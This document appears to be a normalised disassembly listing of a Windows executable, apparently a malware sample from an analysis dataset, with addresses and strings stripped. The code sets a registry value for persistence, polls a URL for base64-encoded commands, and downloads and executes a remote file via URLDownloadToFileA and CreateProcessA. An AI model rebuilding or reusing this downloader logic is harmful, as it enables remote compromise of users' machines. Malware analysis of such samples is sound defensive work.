mov edx [ ebp - 0x1c ]
add edx 0x1
mov [ ebp - 0x1c ] edx
jmp r-xdata
test ecx ecx
je r-xdata
dec ecx
or ecx 0xfffffff0
inc ecx
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x1c ]
movsx ecx [ eax ]
test ecx ecx
je r-xdata
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x1c ]
mov [ eax ] 0x0
mov eax [ ebp - 0x1c ]
cdq
and edx 0xf
add eax edx
sar eax 0x4
mov [ ebp - 0x24 ] eax
mov ecx [ ebp - 0x24 ]
shl ecx 0x2
push ecx
call ??2@YAPAXI@Z
add esp 0x4
mov [ ebp - 0x28 ] eax
mov edx [ ebp - 0x28 ]
mov [ ebp - 0x4 ] edx
mov [ ebp - 0x1c ] 0x0
jmp r-xdata
mov edx [ ebp - 0x1c ]
mov [ ebp - 0x20 ] edx
jmp r-xdata
mov ecx [ ebp - 0x1c ]
cmp ecx [ ebp - 0x24 ]
jge r-xdata
mov ecx [ ebp - 0x1c ]
add ecx 0x10
mov edx [ ebp - 0x1c ]
and edx 0x8000000f
jns r-xdata
mov [ ebp - 0x1c ] 0x0
jmp r-xdata
push 0x14
call ??2@YAPAXI@Z
add esp 0x4
mov [ ebp - 0x2c ] eax
mov edx [ ebp - 0x1c ]
mov eax [ ebp - 0x4 ]
mov ecx [ ebp - 0x2c ]
mov [ eax + edx * 4 ] ecx
jmp r-xdata
sub ecx edx
cmp [ ebp - 0x20 ] ecx
jge r-xdata
dec edx
or edx 0xfffffff0
inc edx
mov eax [ ebp - 0x1c ]
cmp eax [ ebp - 0x24 ]
jge r-xdata
mov eax [ ebp - 0x1c ]
add eax 0x1
mov [ ebp - 0x1c ] eax
mov ecx [ ebp - 0x1c ]
add ecx 0x10
mov edx [ ebp - 0x1c ]
and edx 0x8000000f
jns r-xdata
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0x20 ]
mov [ eax ] 0x30
jmp r-xdata
mov [ ebp - 0x1c ] 0x0
jmp r-xdata
mov [ ebp - 0x20 ] 0x0
jmp r-xdata
sub ecx edx
mov [ ebp - 0x1c ] ecx
dec edx
or edx 0xfffffff0
inc edx
mov eax [ ebp - 0x20 ]
add eax 0x1
mov [ ebp - 0x20 ] eax
mov ecx [ ebp - 0x1c ]
cmp ecx [ ebp - 0x24 ]
jge r-xdata
cmp [ ebp - 0x20 ] 0x10
jge r-xdata
mov edx [ ebp - 0x4 ]
mov [ ebp - 0x30 ] edx
mov eax [ ebp - 0x30 ]
push eax
call ??3@YAXPAX@Z
add esp 0x4
pop esi
mov esp ebp
pop ebp
retn
lea edx [ ebp - 0x18 ]
push edx
mov eax [ ebp + 0x10 ]
push eax
mov ecx [ ebp - 0x1c ]
mov edx [ ebp - 0x4 ]
mov eax [ edx + ecx * 4 ]
push eax
call sub_403394
add esp 0xc
mov ecx [ ebp + 0x14 ]
push ecx
mov edx [ ebp + 0xc ]
push edx
lea eax [ ebp - 0x18 ]
push eax
call sub_404a1c
add esp 0xc
mov [ ebp - 0x20 ] 0x0
jmp r-xdata
mov eax [ ebp - 0x1c ]
mov ecx [ ebp - 0x4 ]
mov edx [ ecx + eax * 4 ]
mov [ edx + 0x10 ] 0x0
jmp r-xdata
mov edx [ ebp - 0x1c ]
shl edx 0x4
add edx [ ebp - 0x20 ]
mov eax [ ebp - 0x1c ]
mov ecx [ ebp - 0x4 ]
mov eax [ ecx + eax * 4 ]
mov ecx [ ebp - 0x20 ]
mov esi [ ebp + 0x8 ]
mov dl [ esi + edx ]
mov [ eax + ecx ] dl
jmp r-xdata
cmp [ ebp - 0x20 ] 0x11
jge r-xdata
mov edx [ ebp - 0x1c ]
add edx 0x1
mov [ ebp - 0x1c ] edx
mov ecx [ ebp - 0x20 ]
add ecx 0x1
mov [ ebp - 0x20 ] ecx
mov [ ebp - 0x20 ] 0x0
jmp r-xdata
mov edx [ ebp + 0x10 ]
add edx [ ebp - 0x20 ]
mov eax [ ebp + 0x14 ]
add eax [ ebp - 0x20 ]
mov cl [ eax ]
mov [ edx ] cl
jmp r-xdata
cmp [ ebp - 0x20 ] 0x10
jge r-xdata
mov ecx [ ebp - 0x20 ]
add ecx 0x1
mov [ ebp - 0x20 ] ecx
push rw-data
call printf
add esp 0x4
jmp r-xdata
mov eax [ ebp + 0x14 ]
add eax [ ebp - 0x20 ]
movsx ecx [ eax ]
push ecx
push rw-data
call printf
add esp 0x8
jmp r-xdata
mov eax [ ebp - 0x1c ]
add eax 0x1
mov [ ebp - 0x1c ] eax
mov edx [ ebp - 0x20 ]
add edx 0x1
mov [ ebp - 0x20 ] edx
sub_404e3e
push ebp
mov ebp esp
sub esp 0x10c
push esi
mov [ ebp - 0xec ] 0x0
mov [ ebp - 0xe8 ] 0x1c
jmp r-xdata
cmp [ ebp - 0xe8 ] 0x2a
jge r-xdata
mov [ ebp - 0xe8 ] 0xe
jmp r-xdata
mov ecx [ ebp + 0xc ]
add ecx [ ebp - 0xe8 ]
mov edx [ ebp - 0xe8 ]
mov al [ ecx ]
mov [ ebp + edx - 0x100 ] al
jmp r-xdata
cmp [ ebp - 0xe8 ] 0x1c
jge r-xdata
mov eax [ ebp - 0xe8 ]
add eax 0x1
mov [ ebp - 0xe8 ] eax
mov [ ebp - 0xe8 ] 0x0
jmp r-xdata
mov edx [ ebp + 0xc ]
add edx [ ebp - 0xe8 ]
mov eax [ ebp - 0xe8 ]
mov cl [ edx ]
mov [ ebp + eax - 0xe4 ] cl
jmp r-xdata
cmp [ ebp - 0xe8 ] 0xe
jge r-xdata
mov ecx [ ebp - 0xe8 ]
add ecx 0x1
mov [ ebp - 0xe8 ] ecx
mov [ ebp - 0xba ] 0x0
mov [ ebp - 0xe8 ] 0x1
mov eax [ ebp + 0xc ]
add eax [ ebp - 0xe8 ]
mov ecx [ ebp - 0xe8 ]
mov dl [ eax ]
mov [ ebp + ecx - 0xc8 ] dl
jmp r-xdata
mov eax [ ebp - 0xe8 ]
push eax
push rw-data
call printf
add esp 0x8
mov ecx [ ebp - 0xe8 ]
and ecx 0x8000000f
jns r-xdata
mov edx [ ebp - 0xe8 ]
add edx 0x1
mov [ ebp - 0xe8 ] edx
jmp r-xdata
mov edx [ ebp - 0xe8 ]
add edx 0x1
mov [ ebp - 0xe8 ] edx
test ecx ecx
je r-xdata
dec ecx
or ecx 0xfffffff0
inc ecx
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0xe8 ]
movsx ecx [ eax ]
test ecx ecx
je r-xdata
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0xe8 ]
mov [ eax ] 0x0
mov eax [ ebp - 0xe8 ]
cdq
and edx 0xf
add eax edx
sar eax 0x4
mov [ ebp - 0xf4 ] eax
mov ecx [ ebp - 0xf4 ]
shl ecx 0x2
push ecx
call ??2@YAPAXI@Z
add esp 0x4
mov [ ebp - 0xf8 ] eax
mov edx [ ebp - 0xf8 ]
mov [ ebp - 0x4 ] edx
mov eax [ ebp - 0xf4 ]
shl eax 0x2
push eax
call ??2@YAPAXI@Z
add esp 0x4
mov [ ebp - 0xfc ] eax
mov ecx [ ebp - 0xfc ]
mov [ ebp - 0x8 ] ecx
mov [ ebp - 0xe8 ] 0x0
jmp r-xdata
mov edx [ ebp - 0xe8 ]
mov [ ebp - 0xf0 ] edx
jmp r-xdata
mov eax [ ebp - 0xe8 ]
cmp eax [ ebp - 0xf4 ]
jge r-xdata
mov ecx [ ebp - 0xe8 ]
add ecx 0x10
mov edx [ ebp - 0xe8 ]
and edx 0x8000000f
jns r-xdata
mov [ ebp - 0xe8 ] 0x0
jmp r-xdata
push 0x14
call ??2@YAPAXI@Z
add esp 0x4
mov [ ebp - 0x100 ] eax
mov ecx [ ebp - 0xe8 ]
mov edx [ ebp - 0x4 ]
mov eax [ ebp - 0x100 ]
mov [ edx + ecx * 4 ] eax
jmp r-xdata
sub ecx edx
cmp [ ebp - 0xf0 ] ecx
jge r-xdata
dec edx
or edx 0xfffffff0
inc edx
mov edx [ ebp - 0xe8 ]
cmp edx [ ebp - 0xf4 ]
jge r-xdata
mov edx [ ebp - 0xe8 ]
add edx 0x1
mov [ ebp - 0xe8 ] edx
mov ecx [ ebp - 0xe8 ]
add ecx 0x10
mov edx [ ebp - 0xe8 ]
and edx 0x8000000f
jns r-xdata
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0xf0 ]
mov [ eax ] 0x30
jmp r-xdata
mov [ ebp - 0xe8 ] 0x0
jmp r-xdata
push 0x14
call ??2@YAPAXI@Z
add esp 0x4
mov [ ebp - 0x104 ] eax
mov eax [ ebp - 0xe8 ]
mov ecx [ ebp - 0x8 ]
mov edx [ ebp - 0x104 ]
mov [ ecx + eax * 4 ] edx
jmp r-xdata
sub ecx edx
mov [ ebp - 0xe8 ] ecx
dec edx
or edx 0xfffffff0
inc edx
mov eax [ ebp - 0xf0 ]
add eax 0x1
mov [ ebp - 0xf0 ] eax
mov ecx [ ebp - 0xe8 ]
cmp ecx [ ebp - 0xf4 ]
jge r-xdata
mov ecx [ ebp - 0xe8 ]
add ecx 0x1
mov [ ebp - 0xe8 ] ecx
mov [ ebp - 0xe8 ] 0x0
jmp r-xdata
mov [ ebp - 0xf0 ] 0x0
jmp r-xdata
mov edx [ ebp - 0xe8 ]
cmp edx [ ebp - 0xf4 ]
jge r-xdata
cmp [ ebp - 0xf0 ] 0x10
jge r-xdata
mov [ ebp - 0xe8 ] 0x0
jmp r-xdata
mov [ ebp - 0xf0 ] 0x0
jmp r-xdata
mov ecx [ ebp - 0xe8 ]
mov edx [ ebp - 0x4 ]
mov eax [ edx + ecx * 4 ]
mov [ eax + 0x10 ] 0x0
jmp r-xdata
mov eax [ ebp - 0xe8 ]
shl eax 0x4
add eax [ ebp - 0xf0 ]
mov ecx [ ebp - 0xe8 ]
mov edx [ ebp - 0x4 ]
mov ecx [ edx + ecx * 4 ]
mov edx [ ebp - 0xf0 ]
mov esi [ ebp + 0x8 ]
mov al [ esi + eax ]
mov [ ecx + edx ] al
jmp r-xdata
mov edx [ ebp - 0xe8 ]
cmp edx [ ebp - 0xf4 ]
jge r-xdata
cmp [ ebp - 0xf0 ] 0x10
jge r-xdata
mov eax [ ebp - 0xe8 ]
add eax 0x1
mov [ ebp - 0xe8 ] eax
mov edx [ ebp - 0xf0 ]
add edx 0x1
mov [ ebp - 0xf0 ] edx
push rw-data
call printf
add esp 0x4
mov eax [ ebp - 0x4 ]
mov [ ebp - 0x108 ] eax
mov ecx [ ebp - 0x108 ]
push ecx
call ??3@YAXPAX@Z
add esp 0x4
mov edx [ ebp - 0x8 ]
mov [ ebp - 0x10c ] edx
mov eax [ ebp - 0x10c ]
push eax
call ??3@YAXPAX@Z
add esp 0x4
pop esi
mov esp ebp
pop ebp
retn
mov eax [ ebp + 0x14 ]
push eax
lea ecx [ ebp - 0xe4 ]
push ecx
mov edx [ ebp - 0xe8 ]
mov eax [ ebp - 0x4 ]
mov ecx [ eax + edx * 4 ]
push ecx
call sub_40482f
add esp 0xc
lea edx [ ebp - 0x80 ]
push edx
mov eax [ ebp + 0x10 ]
push eax
mov ecx [ ebp + 0x14 ]
push ecx
call sub_403394
add esp 0xc
mov [ ebp - 0xf0 ] 0x0
jmp r-xdata
jmp r-xdata
mov ecx [ ebp - 0xe8 ]
mov edx [ ebp - 0x4 ]
mov eax [ edx + ecx * 4 ]
mov ecx [ ebp - 0xe8 ]
mov edx [ ebp - 0x8 ]
mov ecx [ edx + ecx * 4 ]
mov edx [ ebp - 0xf0 ]
mov esi [ ebp - 0xf0 ]
mov al [ eax + esi ]
mov [ ecx + edx ] al
jmp r-xdata
cmp [ ebp - 0xf0 ] 0x11
jge r-xdata
mov ecx [ ebp - 0xe8 ]
add ecx 0x1
mov [ ebp - 0xe8 ] ecx
mov eax [ ebp - 0xf0 ]
add eax 0x1
mov [ ebp - 0xf0 ] eax
mov [ ebp - 0xf0 ] 0x0
jmp r-xdata
mov eax [ ebp - 0xe8 ]
mov ecx [ ebp - 0x8 ]
mov edx [ ecx + eax * 4 ]
mov eax [ ebp + 0x10 ]
add eax [ ebp - 0xf0 ]
mov ecx [ ebp - 0xf0 ]
mov dl [ edx + ecx ]
mov [ eax ] dl
jmp r-xdata
cmp [ ebp - 0xf0 ] 0x8
jge r-xdata
mov edx [ ebp - 0xf0 ]
add edx 0x1
mov [ ebp - 0xf0 ] edx
jmp r-xdata
mov ecx [ ebp - 0xf0 ]
movsx edx [ ebp + ecx * 2 - 0x80 ]
cmp edx 0x39
jle r-xdata
mov ecx [ ebp - 0xe8 ]
add ecx 0x1
mov [ ebp - 0xe8 ] ecx
mov edx [ ebp - 0xf0 ]
movsx eax [ ebp + edx * 2 - 0x80 ]
cmp eax 0x39
jle r-xdata
mov eax [ ebp - 0xf0 ]
movsx ecx [ ebp + eax * 2 - 0x7f ]
cmp ecx 0x39
jle r-xdata
mov eax [ ebp - 0xf0 ]
movsx ecx [ ebp + eax * 2 - 0x80 ]
cmp ecx 0x39
jg r-xdata
mov ecx [ ebp - 0xf0 ]
movsx edx [ ebp + ecx * 2 - 0x7f ]
cmp edx 0x39
jg r-xdata
mov edx [ ebp - 0xf0 ]
movsx eax [ ebp + edx * 2 - 0x80 ]
sub eax 0x57
shl eax 0x4
mov ecx [ ebp - 0xf0 ]
movsx edx [ ebp + ecx * 2 - 0x7f ]
lea eax [ eax + edx - 0x57 ]
mov ecx [ ebp - 0xf0 ]
mov [ ebp + ecx - 0x6c ] al
mov ecx [ ebp - 0xf0 ]
movsx edx [ ebp + ecx * 2 - 0x80 ]
cmp edx 0x39
jg r-xdata
mov edx [ ebp - 0xf0 ]
movsx eax [ ebp + edx * 2 - 0x7f ]
cmp eax 0x39
jle r-xdata
mov eax [ ebp - 0xf0 ]
movsx ecx [ ebp + eax * 2 - 0x80 ]
sub ecx 0x57
shl ecx 0x4
mov edx [ ebp - 0xf0 ]
movsx eax [ ebp + edx * 2 - 0x7f ]
lea ecx [ ecx + eax - 0x30 ]
mov edx [ ebp - 0xf0 ]
mov [ ebp + edx - 0x6c ] cl
mov edx [ ebp - 0xec ]
mov eax [ ebp - 0xf0 ]
mov cl [ ebp + eax - 0x6c ]
mov [ edx + rw-data ] cl
mov edx [ ebp - 0xec ]
add edx 0x1
mov [ ebp - 0xec ] edx
jmp r-xdata
mov eax [ ebp - 0xf0 ]
movsx ecx [ ebp + eax * 2 - 0x7f ]
cmp ecx 0x39
jg r-xdata
mov ecx [ ebp - 0xf0 ]
movsx edx [ ebp + ecx * 2 - 0x80 ]
sub edx 0x30
shl edx 0x4
mov eax [ ebp - 0xf0 ]
movsx ecx [ ebp + eax * 2 - 0x7f ]
lea edx [ edx + ecx - 0x57 ]
mov eax [ ebp - 0xf0 ]
mov [ ebp + eax - 0x6c ] dl
mov eax [ ebp - 0xf0 ]
add eax 0x1
mov [ ebp - 0xf0 ] eax
mov edx [ ebp - 0xf0 ]
movsx eax [ ebp + edx * 2 - 0x80 ]
sub eax 0x30
shl eax 0x4
mov ecx [ ebp - 0xf0 ]
movsx edx [ ebp + ecx * 2 - 0x7f ]
lea eax [ eax + edx - 0x30 ]
mov ecx [ ebp - 0xf0 ]
mov [ ebp + ecx - 0x6c ] al
sub_405449
push ebp
mov ebp esp
sub esp 0x18
push 0x104
call ??2@YAPAXI@Z
add esp 0x4
mov [ ebp - 0x18 ] eax
mov eax [ ebp - 0x18 ]
mov [ ebp - 0x8 ] eax
mov ecx [ ebp + 0x8 ]
push ecx
call strlen
add esp 0x4
mov [ ebp - 0x14 ] eax
mov [ ebp - 0xc ] 0x0
jmp r-xdata
mov eax [ ebp - 0xc ]
cmp eax [ ebp - 0x14 ]
jge r-xdata
mov eax [ ebp - 0x14 ]
imul eax eax 0x3
cdq
and edx 0x3
add eax edx
sar eax 0x2
add eax 0x1
push eax
call malloc
add esp 0x4
mov [ ebp - 0x8 ] eax
mov eax [ ebp - 0x14 ]
imul eax eax 0x3
cdq
and edx 0x3
add eax edx
sar eax 0x2
add eax 0x1
push eax
push 0x0
mov eax [ ebp - 0x8 ]
push eax
call memset
add esp 0xc
mov [ ebp - 0xc ] 0x0
mov [ ebp - 0x10 ] 0x0
jmp r-xdata
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0xc ]
xor edx edx
mov dl [ ecx ]
push edx
mov eax [ rw-data ]
push eax
call strchr
add esp 0x8
mov [ ebp - 0x4 ] eax
cmp [ ebp - 0x4 ] 0x0
jne r-xdata
mov eax [ ebp - 0xc ]
cmp eax [ ebp - 0x14 ]
jge r-xdata
mov ecx [ ebp - 0x4 ]
sub ecx [ rw-data ]
mov edx [ ebp + 0x8 ]
add edx [ ebp - 0xc ]
mov [ edx ] cl
jmp r-xdata
jmp r-xdata
mov eax [ ebp - 0x8 ]
mov esp ebp
pop ebp
retn
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0xc ]
xor edx edx
mov dl [ ecx ]
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0xc ]
xor ecx ecx
mov cl [ eax + 0x1 ]
and ecx 0x30
sar ecx 0x4
lea edx [ ecx + edx * 4 ]
mov eax [ ebp - 0x8 ]
add eax [ ebp - 0x10 ]
mov [ eax ] dl
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0xc ]
xor edx edx
mov dl [ ecx + 0x1 ]
and edx 0xf
shl edx 0x4
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0xc ]
xor ecx ecx
mov cl [ eax + 0x2 ]
and ecx 0x3c
sar ecx 0x2
add edx ecx
mov eax [ ebp - 0x8 ]
add eax [ ebp - 0x10 ]
mov [ eax + 0x1 ] dl
mov ecx [ ebp + 0x8 ]
add ecx [ ebp - 0xc ]
xor edx edx
mov dl [ ecx + 0x2 ]
and edx 0x3
shl edx 0x6
mov eax [ ebp + 0x8 ]
add eax [ ebp - 0xc ]
xor ecx ecx
mov cl [ eax + 0x3 ]
add edx ecx
mov eax [ ebp - 0x8 ]
add eax [ ebp - 0x10 ]
mov [ eax + 0x2 ] dl
jmp r-xdata
mov edx [ ebp - 0xc ]
add edx 0x1
mov [ ebp - 0xc ] edx
mov ecx [ ebp - 0xc ]
add ecx 0x4
mov [ ebp - 0xc ] ecx
mov edx [ ebp - 0x10 ]
add edx 0x3
mov [ ebp - 0x10 ] edx
sub_4055b4
push ebp
mov ebp esp
sub esp 0xc88
push esi
push edi
push 0x7530
call [ Sleep@IAT ]
mov ecx 0xb
mov esi rw-data
lea edi [ ebp - 0x818 ]
[ edi ] [ esi ]
movsw [ edi ] [ esi ]
lea eax [ ebp - 0x204 ]
push eax
push 0x104
call [ GetTempPathA@IAT ]
push rw-data
lea ecx [ ebp - 0x204 ]
push ecx
call strcat
add esp 0x8
lea edx [ ebp - 0x7e8 ]
push edx
push 0xf003f
push 0x0
lea eax [ ebp - 0x818 ]
push eax
push 0x80000001
call [ RegOpenKeyExA@IAT ]
mov [ ebp - 0x7dc ] eax
push 0x104
lea ecx [ ebp - 0x204 ]
push ecx
push 0x1
push 0x0
push rw-data
mov edx [ ebp - 0x7e8 ]
push edx
call [ RegSetValueExA@IAT ]
mov [ ebp - 0x7dc ] eax
cmp [ ebp - 0x7dc ] 0x0
jne r-xdata
mov ecx [ ebp - 0x7dc ]
push ecx
push rw-data
call printf
add esp 0x8
mov eax [ ebp - 0x7e8 ]
push eax
call [ RegCloseKey@IAT ]
jmp r-xdata
lea eax [ ebp - 0xc24 ]
push eax
call strlen
add esp 0x4
cmp [ ebp - 0x7e0 ] eax
jge r-xdata
push 0x0
push 0x0
push 0x0
push 0x0
push rw-data
call [ InternetOpenA@IAT ]
mov [ ebp - 0x7e4 ] eax
push 0x0
push 0x80000000
push 0x0
push 0x0
push rw-data
mov edx [ ebp - 0x7e4 ]
push edx
call [ InternetOpenUrlA@IAT ]
mov [ ebp - 0x820 ] eax
push 0x400
push 0x0
lea eax [ ebp - 0xc24 ]
push eax
call memset
add esp 0xc
mov [ ebp - 0xc2c ] 0x0
lea ecx [ ebp - 0xc2c ]
push ecx
push 0x400
lea edx [ ebp - 0xc24 ]
push edx
mov eax [ ebp - 0x820 ]
push eax
call [ InternetReadFile@IAT ]
mov [ ebp - 0x7d8 ] eax
mov ecx [ ebp - 0x820 ]
push ecx
call [ InternetCloseHandle@IAT ]
mov edx [ ebp - 0x7e4 ]
push edx
call [ InternetCloseHandle@IAT ]
lea eax [ ebp - 0xc24 ]
push eax
push rw-data
call printf
add esp 0x8
mov [ ebp - 0x81c ] 0x0
push 0x400
push 0x0
lea ecx [ ebp - 0x6cc ]
push ecx
call memset
add esp 0xc
mov [ ebp - 0x7e0 ] 0x5
jmp r-xdata
lea edx [ ebp - 0x6cc ]
push edx
push rw-data
call printf
add esp 0x8
push 0x400
call ??2@YAPAXI@Z
add esp 0x4
mov [ ebp - 0xc88 ] eax
mov eax [ ebp - 0xc88 ]
mov [ ebp - 0xc28 ] eax
push 0x400
push 0x0
lea ecx [ ebp - 0xc28 ]
push ecx
call memset
add esp 0xc
push 0x64
push 0x0
lea edx [ ebp - 0x2cc ]
push edx
call memset
add esp 0xc
lea eax [ ebp - 0x6cc ]
push eax
call sub_405449
add esp 0x4
mov [ ebp - 0xc28 ] eax
mov [ ebp - 0x6d0 ] 0x0
mov [ ebp - 0x7e0 ] 0x0
jmp r-xdata
movsx ecx [ ebp - 0xc1f ]
cmp ecx 0x20
jne r-xdata
mov edx [ ebp - 0xc28 ]
push edx
call strlen
add esp 0x4
cmp [ ebp - 0x7e0 ] eax
jge r-xdata
cmp [ ebp - 0x7e0 ] 0x5
jle r-xdata
jmp r-xdata
cmp [ ebp - 0x7e0 ] 0x0
jne r-xdata
mov eax [ ebp - 0x6cc ]
and eax 0xff
test eax eax
jne r-xdata
mov ecx [ ebp - 0x81c ]
mov edx [ ebp - 0x7e0 ]
mov al [ ebp + edx - 0xc24 ]
mov [ ebp + ecx - 0x6cc ] al
mov ecx [ ebp - 0x81c ]
add ecx 0x1
mov [ ebp - 0x81c ] ecx
jmp r-xdata
mov edx [ ebp - 0x7e0 ]
movsx eax [ ebp + edx - 0xc24 ]
cmp eax 0x20
jne r-xdata
cmp [ ebp - 0x6d0 ] 0x0
jne r-xdata
push rw-data
call printf
add esp 0x4
jmp r-xdata
mov ecx [ ebp - 0xc28 ]
add ecx [ ebp - 0x7e0 ]
movsx edx [ ecx ]
cmp edx 0x3d
jne r-xdata
jmp r-xdata
mov edx [ ebp - 0x7e0 ]
add edx 0x1
mov [ ebp - 0x7e0 ] edx
jmp r-xdata
cmp [ ebp - 0x6d0 ] 0x1
jne r-xdata
mov [ ebp - 0x824 ] 0x0
jmp r-xdata
mov cx [ rw-data ]
mov [ ebp - 0x268 ] cx
mov ecx 0x18
xor eax eax
lea edi [ ebp - 0x266 ]
[ edi ]
stosw [ edi ]
mov dx [ rw-data ]
mov [ ebp - 0x7d4 ] dx
mov ecx 0x40
xor eax eax
lea edi [ ebp - 0x7d2 ]
[ edi ]
stosw [ edi ]
push 0x100
push 0x0
lea eax [ ebp - 0x100 ]
push eax
call memset
add esp 0xc
movsx ecx [ ebp - 0x2cc ]
cmp ecx 0x73
jne r-xdata
jmp r-xdata
mov eax [ ebp - 0x6d0 ]
add eax 0x1
mov [ ebp - 0x6d0 ] eax
cmp [ ebp - 0x6d0 ] 0x2
jne r-xdata
mov [ ebp - 0x824 ] 0x0
jmp r-xdata
mov edx [ ebp - 0xc28 ]
push edx
call strlen
add esp 0x4
sub eax [ ebp - 0x6d0 ]
cmp [ ebp - 0x824 ] eax
jae r-xdata
movsx eax [ ebp - 0x2cc ]
cmp eax 0x64
jne r-xdata
movsx edx [ ebp - 0x2ca ]
sub edx 0x30
imul edx edx 0x708
imul edx edx 0x3e8
push edx
call [ Sleep@IAT ]
jmp r-xdata
mov ecx [ ebp - 0x7e0 ]
add ecx 0x1
mov [ ebp - 0x7e0 ] ecx
mov [ ebp - 0x824 ] 0x0
jmp r-xdata
mov eax [ ebp - 0xc28 ]
push eax
call strlen
add esp 0x4
sub eax [ ebp - 0x6d0 ]
cmp [ ebp - 0x824 ] eax
jae r-xdata
mov eax [ ebp - 0xc28 ]
add eax [ ebp - 0x824 ]
movsx ecx [ eax ]
push ecx
push rw-data
call printf
add esp 0x8
mov edx [ ebp - 0xc28 ]
add edx [ ebp - 0x824 ]
mov eax [ ebp - 0x824 ]
mov cl [ edx ]
mov [ ebp + eax - 0x2cc ] cl
jmp r-xdata
push 0xdbba0
call [ Sleep@IAT ]
mov [ ebp - 0x7e0 ] 0x2
mov [ ebp - 0x81c ] 0x0
jmp r-xdata
jmp r-xdata
mov ecx [ ebp - 0xc28 ]
push ecx
call strlen
add esp 0x4
sub eax [ ebp - 0x6d0 ]
cmp [ ebp - 0x824 ] eax
jae r-xdata
mov ecx [ ebp - 0xc28 ]
add ecx [ ebp - 0x824 ]
movsx edx [ ecx ]
push edx
push rw-data
call printf
add esp 0x8
mov eax [ ebp - 0xc28 ]
add eax [ ebp - 0x824 ]
mov ecx [ ebp - 0x824 ]
mov dl [ eax ]
mov [ ebp + ecx - 0x2cc ] dl
jmp r-xdata
mov ecx [ ebp - 0x824 ]
add ecx 0x1
mov [ ebp - 0x824 ] ecx
lea edx [ ebp - 0x2cc ]
push edx
call strlen
add esp 0x4
cmp [ ebp - 0x7e0 ] eax
jge r-xdata
mov edx [ ebp - 0xc28 ]
add edx [ ebp - 0x824 ]
movsx eax [ edx ]
push eax
push rw-data
call printf
add esp 0x8
mov ecx [ ebp - 0xc28 ]
add ecx [ ebp - 0x824 ]
mov edx [ ebp - 0x824 ]
mov al [ ecx ]
mov [ ebp + edx - 0x2cc ] al
jmp r-xdata
mov edx [ ebp - 0x824 ]
add edx 0x1
mov [ ebp - 0x824 ] edx
mov [ ebp - 0xc84 ] 0x44
mov ecx 0x10
xor eax eax
lea edi [ ebp - 0xc80 ]
[ edi ]
lea ecx [ ebp - 0x7d4 ]
push ecx
push 0x104
call [ GetTempPathA@IAT ]
lea edx [ ebp - 0x100 ]
push edx
push 0x0
push rw-data
lea eax [ ebp - 0x7d4 ]
push eax
call [ GetTempFileNameA@IAT ]
push 0x0
push 0x0
lea ecx [ ebp - 0x100 ]
push ecx
lea edx [ ebp - 0x268 ]
push edx
push 0x0
call URLDownloadToFileA
mov [ ebp - 0xc40 ] eax
lea eax [ ebp - 0xc3c ]
push eax
lea ecx [ ebp - 0xc84 ]
push ecx
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
lea edx [ ebp - 0x100 ]
push edx
call [ CreateProcessA@IAT ]
push 0x1b7740
call [ Sleep@IAT ]
jmp r-xdata
mov eax [ ebp - 0x81c ]
mov ecx [ ebp - 0x7e0 ]
mov dl [ ebp + ecx - 0x2cc ]
mov [ ebp + eax - 0x268 ] dl
mov eax [ ebp - 0x81c ]
add eax 0x1
mov [ ebp - 0x81c ] eax
jmp r-xdata
mov eax [ ebp - 0x824 ]
add eax 0x1
mov [ ebp - 0x824 ] eax
mov ecx [ ebp - 0x7e0 ]
add ecx 0x1
mov [ ebp - 0x7e0 ] ecx
_start
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x20
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
and [ ebp - 0x4 ] 0x0
push 0x1
call [ __set_app_type@IAT ]
pop ecx
or [ rw-data ] 0xffffffff
or [ rw-data ] 0xffffffff
call [ __p__fmode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
call [ __p__commode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
mov eax [ _adjust_fdiv@IAT ]
mov eax [ eax ]
mov [ rw-data ] eax
call sub_405d51
cmp [ rw-data ] 0x0
jne r-xdata
call sub_405d3c
push rw-data
push rw-data
call _initterm
mov eax [ rw-data ]
mov [ ebp - 0x28 ] eax
lea eax [ ebp - 0x28 ]
push eax
push [ rw-data ]
lea eax [ ebp - 0x20 ]
push eax
lea eax [ ebp - 0x2c ]
push eax
lea eax [ ebp - 0x1c ]
push eax
call [ __getmainargs@IAT ]
push rw-data
push rw-data
call _initterm
call [ __p___initenv@IAT ]
mov ecx [ ebp - 0x20 ]
mov [ eax ] ecx
push [ ebp - 0x20 ]
push [ ebp - 0x2c ]
push [ ebp - 0x1c ]
call sub_4055b4
push sub_405d4e
call [ __setusermatherr@IAT ]
pop ecx
URLDownloadToFileA
jmp [ URLDownloadToFileA@IAT ]
sub_405cd3
add esp 0x30
mov [ ebp - 0x24 ] eax
push eax
call [ exit@IAT ]
??3@YAXPAX@Z
jmp [ operator delete@IAT ]
??2@YAPAXI@Z
jmp [ operator new@IAT ]
printf
jmp [ printf@IAT ]
memset
jmp [ memset@IAT ]
malloc
jmp [ malloc@IAT ]
strchr
jmp [ strchr@IAT ]
strlen
jmp [ strlen@IAT ]
strcat
jmp [ strcat@IAT ]
_XcptFilter
jmp [ _XcptFilter@IAT ]
_initterm
jmp [ _initterm@IAT ]
sub_405d3c
push 0x30000
push 0x10000
call _controlfp
pop ecx
pop ecx
retn
sub_405d4e
xor eax eax
retn
sub_405d51
retn
_except_handler3
jmp [ _except_handler3@IAT ]
_controlfp
jmp [ _controlfp@IAT ]
